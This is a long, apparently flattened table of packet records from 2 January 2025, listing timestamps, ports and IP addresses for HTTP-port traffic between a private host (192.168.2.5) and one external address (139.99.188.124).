                                                          Jan 2, 2025 10:54:57.228210926 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.228221893 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.228231907 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.228269100 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229635000 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229652882 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229664087 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229667902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229675055 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229707956 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229731083 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229800940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229819059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229829073 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229837894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229847908 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229857922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229862928 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229867935 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229877949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229887962 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229890108 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229897976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229907036 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229909897 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229918003 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229928017 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229929924 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229938984 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229947090 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229964018 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229968071 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.229975939 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229985952 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.229994059 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.230020046 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.230719090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230736017 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230752945 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230762959 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230772018 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230777025 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.230782032 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230793953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230803013 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230803967 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.230813026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230824947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.230834007 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.230870008 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430741072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430763960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430773973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430820942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430830956 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430841923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430851936 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430886030 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430907965 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.430963993 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430974960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430984974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.430994987 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431006908 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431046009 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431168079 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431180000 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431216002 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431261063 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431272984 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431282043 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431308031 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431497097 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431509018 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431518078 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431528091 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431536913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431545019 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431549072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431579113 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431716919 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431727886 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431739092 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.431770086 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.431783915 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432141066 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432177067 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432188988 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432216883 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432282925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432326078 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432367086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432378054 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432387114 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432396889 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432409048 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432440042 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432533026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432543039 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432553053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432585955 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.432661057 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.432709932 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433130980 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433141947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433176994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433182001 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433224916 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433234930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433276892 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433341980 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433386087 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433414936 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433425903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433435917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433445930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433463097 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433497906 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.433585882 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433598042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.433635950 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434093952 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434112072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434151888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434159040 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434163094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434202909 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434297085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434309006 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434318066 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434326887 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434345007 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434372902 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434427023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434482098 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434492111 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434501886 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.434526920 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.434554100 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435035944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435054064 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435064077 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435106039 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435192108 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435211897 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435220957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435246944 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435264111 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435354948 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435365915 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435375929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435384989 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435422897 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.435525894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435537100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.435580015 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.436009884 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.436125994 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.522912025 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522923946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522939920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522944927 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522959948 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.522969961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523053885 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523062944 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.523066044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523077965 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.523102045 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.523119926 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.635926962 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635948896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635957003 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.635999918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636010885 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636111021 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636115074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636127949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636143923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636178017 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636197090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636199951 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636276007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636286974 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636323929 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636377096 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636387110 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636428118 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636457920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636467934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636477947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636509895 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636526108 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636570930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636593103 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636626959 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636684895 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636696100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636704922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636729002 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636826038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636842012 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636851072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636859894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636868000 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636872053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.636884928 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.636915922 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637067080 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637077093 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637087107 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637113094 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637147903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637193918 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637223959 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637236118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637269020 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637356997 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637367010 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637377024 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637387037 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637408018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637423992 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637640953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637651920 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637661934 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637671947 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637681961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637691975 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637691975 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637702942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637705088 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637713909 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637723923 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637731075 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637748957 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.637975931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637986898 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.637998104 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638020039 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638041973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638103008 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638113976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638124943 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638149023 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638216019 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638227940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638264894 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638361931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638371944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638380051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638397932 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638407946 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638407946 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638420105 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638427973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638459921 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638705015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638716936 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638725996 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638736010 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638745070 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638755083 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638765097 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638767004 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638775110 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638780117 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638789892 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.638796091 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638811111 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.638824940 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639038086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639112949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639123917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639163971 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639321089 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639334917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639343977 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639353991 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639374971 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639391899 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639508963 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639518976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639528990 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639539003 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639548063 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639554977 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639558077 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639569998 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639575958 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639579058 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639590979 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639595032 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639616966 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639648914 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639821053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639867067 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639878035 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639887094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.639905930 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.639919043 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640077114 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640088081 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640099049 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640129089 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640213966 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640223980 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640229940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640235901 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640259027 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640275002 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640464067 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640475035 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640484095 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640492916 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640502930 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640506029 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640515089 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640525103 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640535116 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640535116 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640546083 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640562057 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640579939 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.640826941 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640837908 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640847921 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640857935 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.640892982 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.641072035 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641083002 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641092062 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641102076 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641110897 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641117096 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.641153097 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.641196012 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641212940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641222954 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.641252995 CET4970480192.168.2.5139.99.188.124
